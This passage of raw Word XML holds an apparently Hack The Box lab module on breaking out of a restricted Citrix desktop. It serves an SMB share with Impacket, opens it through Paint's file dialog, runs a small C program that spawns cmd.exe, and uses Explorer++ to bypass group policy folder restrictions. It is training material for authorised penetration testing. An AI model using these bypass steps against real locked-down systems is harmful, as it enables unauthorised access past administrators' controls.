          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> script.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A994EE1"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C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>root@ubuntu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>:/home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>htb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>-student/Tools# smbserver.py -smb2support share $(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2673ED20"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
    <w:p w14:paraId="485CA0DE"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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Impacket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> v0.10.0 - Copyright 2022 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>SecureAuth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Corporation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24943FFD"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 Config file </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>parsed</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6667907E"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Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1F2BD5"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Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE16018"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 Config file </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>parsed</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6D307120"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 Config file </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>parsed</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7670D4EE"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 Config file </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>parsed</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="61A5957C"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Back in the Citrix environment, initiate the "Paint" application via the start menu. Proceed to navigate to the "File" menu and select "Open", thereby prompting the Dialog Box to appear. Within this Windows dialog box associated with Paint, input the UNC path as </w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>\\10.13.38.95\share</w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> into the designated "File name" field. Ensure that the File-Type parameter is configured to "All Files." Upon pressing the "Enter" key, entry into the share is achieved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2864ACF6" w14:textId="3DA66442"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5AD9B95B" wp14:editId="61EC78FC">
            <wp:extent cx="3256965" cy="2597345"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="1060919211"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1091" cy="2608610"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="394C16F5"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Due to the presence of restrictions within the File Explorer, direct file copying is not viable. Nevertheless, an alternative approach involves </w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>right-clicking</w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the executables and subsequently launching them. Right-click on the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>pwn.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> binary and select </w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Open</w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">, which should prompt us to run it and a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> console will be opened.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37199AAF" w14:textId="0A5CE710"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6DA8CBE5" wp14:editId="2FA590CA">
            <wp:extent cx="3868965" cy="3085399"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="696040383"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6770" cy="3091623"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4FF1B4"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The executable </w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>pwn.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a custom compiled binary from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>pwn.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> file which upon execution </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>opens up</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> the cmd.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F88731"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Code: c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466745EE"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#include &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>stdlib.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F2A138"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int </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>main(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311F8815"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 xml:space="preserve">  system("C:\\Windows\\System32\\cmd.exe"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="21B463F3"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SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206B3559"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We can then use the obtained </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> access to copy files from SMB share to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>pmorgans</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Desktop directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEA6987" w14:textId="68CEEF50"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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FA30959" wp14:editId="419A30ED">
            <wp:extent cx="3482071" cy="1761482"/>
            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
            <wp:docPr id="351082652"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9795" cy="1770448"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADF43D8"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2CAA9099">
          <v:rect id="_x0000_i1036" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="623AB392"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t>Alternate Explorer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0107DCDB"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In cases where strict restrictions are imposed on File Explorer, alternative File System Editors like </w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Q-Dir</w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Explorer++</w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be employed as a workaround. These tools can bypass the folder restrictions enforced by group policy, allowing users to navigate and access files and directories that would otherwise be restricted within the standard File Explorer environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B077DB"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It's worth noting the previous inability of File Explorer to copy files from the SMB share due to restrictions in place. However, through the utilization of </w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Explorer++</w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">, the capability to copy files from the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>\\10.13.38.95\share</w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> location to the Desktop belonging to the user </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>pmorgan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> has been successfully demonstrated in following screenshot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF2CC2C" w14:textId="619A07FB"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2679FB66" wp14:editId="4BFEB208">
            <wp:extent cx="3425525" cy="2720761"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
            <wp:docPr id="230521992"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4044" cy="2727527"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="668FA17D"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hyperlink r:id="rId14" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00C06BC9">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
